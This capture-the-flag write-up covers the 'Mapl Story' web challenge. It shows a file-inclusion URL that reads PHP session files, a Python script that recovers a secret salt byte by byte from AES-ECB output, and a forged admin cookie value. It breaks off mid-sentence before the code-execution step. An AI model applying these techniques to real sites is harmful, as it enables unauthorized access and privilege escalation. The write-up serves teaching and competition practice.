# Mapl Story

Mapl Story was part of the MeePwnCTF Quals 2018 and consists of a webpage where you can name a
"character" and train a pet a command. You get the code but the config is censored.

## Have a look around

First off, let's create an account, e.g. foobar@example.org / foobar123, and set any character name; we'll change that later.

Sign in and have a look at your cookies: you'll see your PHPSESSID and a `_role` cookie.
`_role` is generated as either `sha256("admin".$salt)` or (for a normal account like ours) `sha256("user".$salt)`.
Forging the admin value therefore requires the salt, so that is what we need to recover first.

Have a look around the few pages on the site. The game page is completely irrelevant, just a gimmick.

## File inclusion vulnerability

There is a file inclusion vulnerability in index.php, so have a look at e.g. `/index.php?page=/etc/group`.
Unfortunately the `page` GET parameter is heavily escaped, so for now the bug only lets us read files the web
server can access; there isn't much we can directly do with it beyond that.

## Let's get salty

Let's have a look at `/index.php?page=/var/lib/php/sessions/sess_PHPSESSID` (replace `PHPSESSID` with the value of your own session cookie); the inclusion bug lets us read our own serialized session file.

You'll see a variable called `character_name`.
`character_name` is AES-128-ECB ciphertext produced by `openssl_encrypt($data.$salt,"AES-128-ECB",$key)`, where `$data` is our character name.
ECB encrypts each 16-byte block independently and deterministically, so identical plaintext blocks give identical ciphertext blocks, regardless of the (unknown) key.
Since we control the start of the plaintext (it's the character name you can update on your settings page!) and the salt is appended right after it, we can recover the salt byte by byte.

We start off by setting a character name of `AAAAAAAAAAAAAAA` (15x'A') and noting the first ciphertext block (the first 32 characters
of the encoded value in the session file); that block encrypts our 15 'A's followed by the first byte of the salt. Now we try printable characters
at the 16th position, i.e. names of the form `AAAAAAAAAAAAAAA?`, and compare the first block each time: it matches at
`AAAAAAAAAAAAAAAm`, so we know the salt starts with `m`. Next we do the same thing with `AAAAAAAAAAAAAA` (14x'A'), note the
first block again, and try names of the form `AAAAAAAAAAAAAAm?`; the next match will be `AAAAAAAAAAAAAAms`.

We'll continue this until we finally get the salt: `ms_g00d_0ld_g4m3`.
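The byte-at-a-time procedure above, as an added example that is not part of the original writeup or the challenge code. It models the server's `openssl_encrypt($name.$salt, "AES-128-ECB", $key)` call with a small pure-Python AES-128 (PKCS#7 padding, as PHP's openssl_encrypt applies by default), a constructed key the attacker never learns, and the writeup's salt standing in as the hidden value. The recovery loop generalises the 15-A / 14-A / ... steps to secrets longer than one block, and a one-call check confirms the ECB property before the attack is run.

```python
import string

# --- Minimal AES-128 (encryption only), just enough to model the server's call ---

def gf_mul(a: int, b: int) -> int:
    """Multiply two bytes in GF(2^8) with the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    r = 0
    for _ in range(8):
        if b & 1:
            r ^= a
        a = ((a << 1) ^ (0x1B if a & 0x80 else 0)) & 0xFF
        b >>= 1
    return r

def _make_sbox() -> list:
    """S-box = affine transform of the multiplicative inverse (a^254); 0 maps to 0x63."""
    sbox = []
    for a in range(256):
        inv = 1
        for _ in range(254):
            inv = gf_mul(inv, a)
        x = inv
        for s in (1, 2, 3, 4):
            x ^= ((inv << s) | (inv >> (8 - s))) & 0xFF
        sbox.append(x ^ 0x63)
    return sbox

SBOX = _make_sbox()
MUL2 = [gf_mul(x, 2) for x in range(256)]
MUL3 = [gf_mul(x, 3) for x in range(256)]

def expand_key(key: bytes) -> list:
    """AES-128 key schedule: returns the 11 round keys as 16-byte strings."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord + SubWord
            t[0] ^= rcon
            rcon = gf_mul(rcon, 2)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [bytes(sum(w[4 * r:4 * r + 4], [])) for r in range(11)]

def aes128_encrypt_block(round_keys: list, block: bytes) -> bytes:
    """Encrypt one 16-byte block. The state is kept flat in input order (column-major)."""
    s = [b ^ k for b, k in zip(block, round_keys[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                                              # SubBytes
        s = [s[((c + r) % 4) * 4 + r] for c in range(4) for r in range(4)]   # ShiftRows
        if rnd < 10:                                                          # MixColumns
            mixed = []
            for c in range(4):
                a0, a1, a2, a3 = s[4 * c:4 * c + 4]
                mixed += [MUL2[a0] ^ MUL3[a1] ^ a2 ^ a3,
                          a0 ^ MUL2[a1] ^ MUL3[a2] ^ a3,
                          a0 ^ a1 ^ MUL2[a2] ^ MUL3[a3],
                          MUL3[a0] ^ a1 ^ a2 ^ MUL2[a3]]
            s = mixed
        s = [b ^ k for b, k in zip(s, round_keys[rnd])]                        # AddRoundKey
    return bytes(s)

# --- The server side as seen by the attacker: an encryption oracle over name||salt ---

BLOCK = 16
SECRET_SALT = b"ms_g00d_0ld_g4m3"              # the salt from the writeup, playing the hidden config value
ROUND_KEYS = expand_key(b"constructed-key!")   # constructed 16-byte key; the attack never needs it

def session_character_name(name: bytes) -> bytes:
    """Models openssl_encrypt($name.$salt, "AES-128-ECB", $key): PKCS#7 padding, blocks encrypted independently."""
    data = name + SECRET_SALT
    pad = BLOCK - len(data) % BLOCK
    data += bytes([pad]) * pad
    return b"".join(aes128_encrypt_block(ROUND_KEYS, data[i:i + BLOCK]) for i in range(0, len(data), BLOCK))

def looks_like_ecb(oracle) -> bool:
    """Check before attacking: two identical plaintext blocks yield two identical ciphertext blocks only in ECB."""
    ct = oracle(b"A" * (2 * BLOCK))
    return ct[:BLOCK] == ct[BLOCK:2 * BLOCK]

def recover_secret(oracle, alphabet: bytes = string.printable.encode()) -> bytes:
    """Byte-at-a-time recovery of the secret the oracle appends to our input (works past one block)."""
    known = b""
    while True:
        filler = b"A" * (BLOCK - 1 - len(known) % BLOCK)   # pushes the next unknown byte to the end of a block
        idx = len(known) // BLOCK                            # the ciphertext block that byte lands in
        target = oracle(filler)[idx * BLOCK:(idx + 1) * BLOCK]
        for c in alphabet:
            probe = filler + known + bytes([c])              # same block, but with our guess in the last slot
            if oracle(probe)[idx * BLOCK:(idx + 1) * BLOCK] == target:
                known += bytes([c])
                break
        else:
            return known   # no printable byte matches: we hit the PKCS#7 padding, the secret is complete

if __name__ == "__main__":
    print("ECB oracle:", looks_like_ecb(session_character_name))
    print("recovered salt:", recover_secret(session_character_name))
```

Against the real target every `oracle()` call is a settings-page update followed by a read of the session file through the inclusion bug; the loop terminates on its own because the byte after the salt is PKCS#7 padding, which is never in the printable alphabet.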

## Becoming admin

Becoming admin is now as simple as writing the value of `sha256("admin"."ms_g00d_0ld_g4m3")` into our `_role`
cookie. After refreshing the page you'll see the admin link appear in the navigation bar.

`sha256("admin"."ms_g00d_0ld_g4m3") => a2ae9db7fd12a8911be74590b99bc7ad1f2f6ccd2e68e44afbf1280349205054`

## Give yourself a pet

In the admin menu, give yourself a pet. This allows you to train it commands on the character
page, which simply writes a text file to `"uploads/".md5($salt.$email)."/command.txt"`.
A lot of characters are filtered and you can only write 19 characters, so this alone doesn't get you very far.

19 characters is just barely long enough to fit a base64-encoded ```

Original writeup (http://blog.redrocket.club/2018/07/15/meepwn-quals-2018-maplstory/).